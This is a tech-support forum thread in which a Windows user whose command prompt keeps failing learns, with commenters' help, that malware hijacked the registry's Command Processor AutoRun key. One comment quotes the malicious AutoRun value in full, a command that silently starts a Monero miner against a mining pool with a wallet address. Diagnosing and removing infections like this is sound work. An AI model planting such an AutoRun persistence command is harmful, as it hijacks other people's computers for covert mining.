0

By this evening, I was able to use CMD just fine. However, just now, whenever I try to access CMD I see the following error.

Error Image

Before this error, the window would just open up and close and spawn a process named SoundMixer.exe in Task Manager. So, I went ahead and deleted it since it was probably a virus. Any help as to how I can fix this would be greatly appreciated as soon as possible.

Scott - Слава Україні
  • 21,399
  • 46
  • 64
  • 121
Asym
  • 101
  • 4
  • When you say you're "accessing CMD", how exactly are you accessing it and how exactly is it failing? Does it open? When it opens, what command are you running to get the error that you're getting? – Hashim Aziz Aug 31 '17 at 21:17
  • I can't even get it to open. I've tried opening it using the cmd search in start menu as well as opening it from C:\Windows\System32\cmd.exe . I have attached the error image also. Link in the post. – Asym Aug 31 '17 at 21:18
  • PS: After I click OK on that message. Windows explorer opens up. – Asym Aug 31 '17 at 21:19
  • So you're saying that the moment you click on CMD, either from the Start Menu or System32, that error message pops up? – Hashim Aziz Aug 31 '17 at 21:21
  • Yes exactly.... – Asym Aug 31 '17 at 21:21
  • Searching SoundMixer.exe does bring up lots of talk of viruses, it's very likely that it is one. Go to System Restore and see if you have any restore points from before this problem was taking place. If you do, restore to them and determine whether that fixes the problem. – Hashim Aziz Aug 31 '17 at 21:24
  • I don't have any restore points in system restore. And I would really like to start it up asap :( – Asym Aug 31 '17 at 21:26
  • I don't understand. You say that earlier today you were able to use CMD just fine. Then you say “Before this error, the window would just open up and close and spawn a process named SoundMixer.exe in Task Manager.” Are you saying that this is what happened when you ran CMD *before* you deleted ````SoundMixer.exe```` and (not surprisingly) started getting an error message about ````SoundMixer.exe```` not found? That is not normal behavior for when you run CMD! What are you saying? – G-Man Says 'Reinstate Monica' Aug 31 '17 at 21:30
  • Make an empty SoundMixer.exe file at the specified location. It should try to start it, fail, print an error, and give you the control back. Also, does powershell do this as well? – doriclazar Aug 31 '17 at 21:34
  • @G-Man CMD was working BEFORE. Then, strangely it stopped working. When I opened cmd it opened and closed instantly (opening SoundMixer.exe process). So I deleted that process and I can't still get it to work. (Hence, the error message) – Asym Aug 31 '17 at 21:39
  • If you actually have been hit by a virus, that won't be possible, and your best bet right now is to do everything you can to get to the point where your system wasn't compromised. Were you running an antivirus at the time? If you have one, run a scan in your antivirus. In addition, download [Malwarebytes](https://www.malwarebytes.com/mwb-download/) and run a scan in it. – Hashim Aziz Aug 31 '17 at 21:39
  • @doriclazar I did what you said. Create an empty exe file and I get error "SoundMixer.exe is not a valid win32 application" – Asym Aug 31 '17 at 21:40
  • 1
    A virus may have installed a start-up command file - see [this answer](https://stackoverflow.com/a/17405182/5164855). Check if your registry has HKCU\Software\Microsoft\Command Processor\AutoRun and delete the entry or replace the target file if so. – AFH Aug 31 '17 at 21:41
  • @AFH Thanks a lot man! I found the root of the cause. The AutoRun field points to something like this: `@mode 15,1 & start /MIN "" "C:\Users\Asim\AppData\Roaming\Microsoft\SoundMixer\SoundMixer.exe" -a cryptonight -o stratum+tcp://pool.minexmr.com:80 -u 4AQLzBQYq7nHAhtwjXb2XZZikWknhqxzmAgNvRkPrKW3Kp7nn3XrkaHh22L8r8B6s2ezjPtye76YqQoFqdeJTxvqGQWRoBy+10000 -p x -k -t 1 -B & explorer.exe & exit` – Asym Aug 31 '17 at 21:44
  • Wow, nice catch on @AFH's part. Definitely a virus. It's hijacking CMD to launch SoundMixer.exe, which seems to be some sort of malware for sending data back to a TCP address. Keylogger, perhaps? – Hashim Aziz Aug 31 '17 at 21:51
  • Obviously, delete the key and see if you can now run CMD. Then run the virus scans that I suggested. – Hashim Aziz Aug 31 '17 at 21:52
  • @AFH So, I changed the SoundMixer.exe to cmd.exe and (Without changing anything else, unfortunately) and ran cmd.exe and it started opening Windows Explorer infinitely. So I powered off and turned on again but now my PC is unusable since it starts opening infinite explorer.exe at startup. Even in safe mode. I'm writing this from my phone right now... – Asym Aug 31 '17 at 21:53
  • Thanks a lot everyone for your support. I changed the value of that field to empty and the problem went away. Especially AFH and definitely going to run those scans @hashim. Thanks once again :) – Asym Aug 31 '17 at 22:09
  • How did you manage to change it if you couldn't get into safe mode? – Hashim Aziz Aug 31 '17 at 22:10
  • Somehow I opened task manager and terminated cmd.exe process. Then I opened regedit and changed the value. – Asym Aug 31 '17 at 22:11
  • Glad that my instincts were correct, and you've solved it, at least as far as removing the immediate problem. You now have the possibly bigger task of eradicating the virus. You may have been able to log in as another account to solve it, but equally all your accounts could have been compromised, and you should check the equivalent setting on all of them. – AFH Aug 31 '17 at 23:24

0 Answers0